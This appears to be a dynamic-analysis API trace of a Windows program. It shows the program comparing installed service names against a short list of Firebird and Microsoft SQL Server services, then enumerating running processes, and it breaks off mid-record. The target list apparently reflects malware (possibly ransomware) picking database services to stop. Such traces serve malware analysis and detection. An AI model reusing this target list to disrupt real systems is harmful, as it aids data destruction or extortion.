[0179.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0179.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0179.108] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0179.109] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0179.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0179.109] lstrlenW (lpString="FontCache") returned 9 [0179.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0179.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0179.109] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0179.109] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0179.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0179.109] lstrlenW (lpString="gpsvc") returned 5 [0179.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0179.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0179.109] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0179.109] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0179.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0179.109] lstrlenW (lpString="iphlpsvc") returned 8 [0179.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0179.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0179.109] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0179.109] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0179.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0179.109] lstrlenW (lpString="KeyIso") returned 6 [0179.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0179.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0179.109] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0179.109] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0179.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0179.109] lstrlenW (lpString="LanmanServer") returned 12 [0179.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0179.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0179.110] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0179.110] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0179.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0179.110] lstrlenW (lpString="LanmanWorkstation") returned 17 [0179.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0179.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0179.110] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0179.110] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0179.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0179.110] lstrlenW (lpString="lfsvc") returned 5 [0179.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0179.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0179.110] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0179.110] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0179.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0179.110] lstrlenW (lpString="lmhosts") returned 7 [0179.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0179.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0179.110] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0179.110] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0179.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0179.110] lstrlenW (lpString="LSM") returned 3 [0179.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0179.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0179.110] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0179.110] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0179.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0179.111] lstrlenW (lpString="MpsSvc") returned 6 [0179.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0179.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0179.111] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0179.111] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0179.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0179.111] lstrlenW (lpString="NcbService") returned 10 [0179.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0179.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0179.111] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0179.111] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0179.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0179.111] lstrlenW (lpString="netprofm") returned 8 [0179.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0179.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0179.111] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0179.408] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0179.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0179.408] lstrlenW (lpString="NgcSvc") returned 6 [0179.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0179.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0179.408] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0179.408] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0179.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0179.408] lstrlenW (lpString="NlaSvc") returned 6 [0179.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0179.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0179.408] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0179.408] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0179.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0179.409] lstrlenW (lpString="nsi") returned 3 [0179.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0179.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0179.409] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0179.409] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0179.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0179.409] lstrlenW (lpString="PcaSvc") returned 6 [0179.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0179.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0179.409] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0179.409] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0179.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0179.409] lstrlenW (lpString="PlugPlay") returned 8 [0179.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0179.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0179.409] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0179.409] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0179.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0179.409] lstrlenW (lpString="Power") returned 5 [0179.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0179.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0179.409] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0179.409] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0179.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0179.409] lstrlenW (lpString="ProfSvc") returned 7 [0179.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0179.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0179.409] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0179.409] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0179.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0179.410] lstrlenW (lpString="RpcEptMapper") returned 12 [0179.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0179.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0179.410] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0179.410] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0179.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0179.410] lstrlenW (lpString="RpcSs") returned 5 [0179.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0179.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0179.410] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0179.410] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0179.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0179.410] lstrlenW (lpString="SamSs") returned 5 [0179.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0179.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0179.410] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0179.410] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0179.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0179.410] lstrlenW (lpString="Schedule") returned 8 [0179.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0179.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0179.410] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0179.410] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0179.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0179.410] lstrlenW (lpString="SecurityHealthService") returned 21 [0179.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0179.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0179.410] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0179.411] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0179.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0179.411] lstrlenW (lpString="SENS") returned 4 [0179.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0179.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0179.411] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0179.411] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0179.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0179.411] lstrlenW (lpString="ShellHWDetection") returned 16 [0179.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0179.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0179.411] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0179.411] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0179.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0179.411] lstrlenW (lpString="Spooler") returned 7 [0179.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0179.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0179.411] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0179.411] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0179.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0179.411] lstrlenW (lpString="StateRepository") returned 15 [0179.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0179.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0179.411] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0179.411] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0179.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0179.411] lstrlenW (lpString="SysMain") returned 7 [0179.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0179.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0179.412] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0179.412] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0179.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0179.412] lstrlenW (lpString="SystemEventsBroker") returned 18 [0179.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0179.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0179.412] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0179.412] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0179.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0179.412] lstrlenW (lpString="Themes") returned 6 [0179.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0179.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0179.412] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0179.412] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0179.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0179.412] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0179.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0179.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0179.412] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0179.412] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0179.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x772b48 | out: hHeap=0x680000) returned 1 [0179.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x364 [0179.417] Process32FirstW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.418] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.419] lstrlenW (lpString="System") returned 6 [0179.419] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.419] lstrlenW (lpString="smss.exe") returned 8 [0179.420] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.420] lstrlenW (lpString="csrss.exe") returned 9 [0179.420] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.423] lstrlenW (lpString="wininit.exe") returned 11 [0179.423] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.425] lstrlenW (lpString="csrss.exe") returned 9 [0179.425] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.426] lstrlenW (lpString="winlogon.exe") returned 12 [0179.426] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.426] lstrlenW (lpString="services.exe") returned 12 [0179.426] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.427] lstrlenW (lpString="lsass.exe") returned 9 [0179.427] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0179.428] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0179.428] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0179.429] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0179.429] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.430] lstrlenW (lpString="svchost.exe") returned 11 [0179.430] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.430] lstrlenW (lpString="svchost.exe") returned 11 [0179.431] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.431] lstrlenW (lpString="dwm.exe") returned 7 [0179.431] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.432] lstrlenW (lpString="svchost.exe") returned 11 [0179.432] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.433] lstrlenW (lpString="svchost.exe") returned 11 [0179.433] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.434] lstrlenW (lpString="svchost.exe") returned 11 [0179.434] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.435] lstrlenW (lpString="svchost.exe") returned 11 [0179.435] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.435] lstrlenW (lpString="svchost.exe") returned 11 [0179.435] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.436] lstrlenW (lpString="svchost.exe") returned 11 [0179.436] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.437] lstrlenW (lpString="svchost.exe") returned 11 [0179.437] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.438] lstrlenW (lpString="svchost.exe") returned 11 [0179.438] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.439] lstrlenW (lpString="svchost.exe") returned 11 [0179.439] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.440] lstrlenW (lpString="svchost.exe") returned 11 [0179.440] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.441] lstrlenW (lpString="spoolsv.exe") returned 11 [0179.441] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.442] lstrlenW (lpString="svchost.exe") returned 11 [0179.442] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.442] lstrlenW (lpString="audiodg.exe") returned 11 [0179.443] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0179.443] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0179.443] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0179.444] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0179.444] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory 